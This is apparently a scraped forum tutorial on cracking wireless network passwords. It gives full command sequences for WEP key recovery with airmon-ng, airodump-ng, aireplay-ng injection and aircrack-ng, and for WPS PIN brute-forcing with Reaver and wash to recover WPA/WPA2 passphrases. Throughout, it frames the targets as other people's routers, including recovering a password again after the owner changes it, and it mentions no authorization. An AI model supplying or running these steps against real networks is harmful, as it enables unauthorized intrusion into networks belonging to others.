You are on page 1of 7

Locate your wireless card device name, to do this, open up Terminal, and type the following: 'iwconfig' and

press enter. You should see your wireless device in the subsequent list. Chances are it will be named 'wlan0', but if you have more than one wireless card, or an unusual networking setup, it may be named something different.

Step 2: Enable monitor mode on your wireless card, to do this, type the following command: 'airmon-ng start wlan0'

Step 3: Find the BSSID of the router you would like to crack, To do this, type the following command: 'airodump-ng wlan0' (if wlan0 doesn't work, try using mon0 instead.) You will see a list of wireless networks in range, It will look similar to the following image below:

When you have spotted the network you would like to crack, press Ctrl+C to stop the list from refreshing. Select the BSSID by Highlighting it, and copy it. Step 4:

It's finally time to crack that network, To do this, Type the following command: 'reaver -i moninterface -b bssid -vv' Put your monitor interface (wlan0, mon0, or other) where I put 'moninterface', and put your target's BSSID where I typed bssid. eg. 'reaver -i mon0 -b 12:34:56:78:90:10' Press enter, sit back, and let Reaver do it's incredible attack.

- Note, Cracking can take anywhere from 2 hours to a full day, BE PATIENT!

WEP Cracking What is Aircrack-NG? Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks. How do i use this tool? Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password. These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good. Let's Begin. Open up a terminal and type: Quote:airmon-ng

Spoiler (Click to View) This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0. Now, we need to set the wireless card in monitor mode, to do that type: Quote:airmon-ng start wlan1 Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0 After that, type: Quote:airodump-ng mon0

Spoiler (Click to View) When you press enter, it should show you all the Access Points near you. Copy the BSSID and remember the Channel Number of the target AP.

Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP. Spoiler (Click to View) Now, type: Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0

Spoiler (Click to View) You should know start recieving DATA. Spoiler (Click to View) To speed up this proccess, open up another terminal and type: Quote:aireplay-ng -1 0 -a [BSSID] mon0 After it says it was successfull, type: Quote:aireplay-ng -3 -b [BSSID] mon0

Spoiler (Click to View) After a some seconds, this should appear: Spoiler (Click to View) When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type: Quote:aircrack-ng wep-01.cap Now, wait for some minutes and it should give you the PASSWORD! The password is:

Quote:EF855844B288E4BB1BA9ADF14D Spoiler (Click to View) WPA2-PSK Cracking Reaver What is reaver? Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. How do i use this tool? As said above, just follow this tutorial :) NOTE: Reaver doesn't need any Dictionary files! First, type: Quote:airmon-ng As said earlier, this shows you, your wireless card name. I'll use wlan0 We need to set it the wireless card on monitor mode, so type: Quote:airmon-ng start wlan0 After that, type: Quote:airodump-ng mon0

Spoiler (Click to View) Now, copy the BSSID of the target AP.

Press CONTROL+c to cancel To see the AP's that are vulnerable to WPS attacks, type: Quote:wash -i mon0 If the target AP is vulnerable, it should say: Quote:WPS Locked: No

Spoiler (Click to View) Now, to start the attack, type: Quote:reaver -i mon0 -b [BSSID] -vv

Spoiler (Click to View) Now, you'll need to wait around 2-10 hours. If the AP is limiting you with a message saying: Quote:[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-trying AND If reaver says that it is trying the same pin, over and over, press CONTROL+c to cancel, then type: Quote:reaver --help This will show you the help menu, you can start playing with the options that you have. I usually add the: -c -S -L

Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -S -L -vv This one works great for me, so keep playing with the options untill it works! When it reaches 100% it should give you some lines, the password is the one after:

Quote:WPS PSK: 'PASSWORD HERE' And here it is! You should also, remember the PIN. Quote:WPS PIN: PIN HERE Now, let's say for some reason, the router's owner changed the password for his WiFi. Since you already have the pin, type: Quote:reaver -i mon0 -c [CHANNEL NUMBER] -b [BSSID] -p [PIN NUMBER] -vv And it should give you the password in a matter of seconds!

You might also like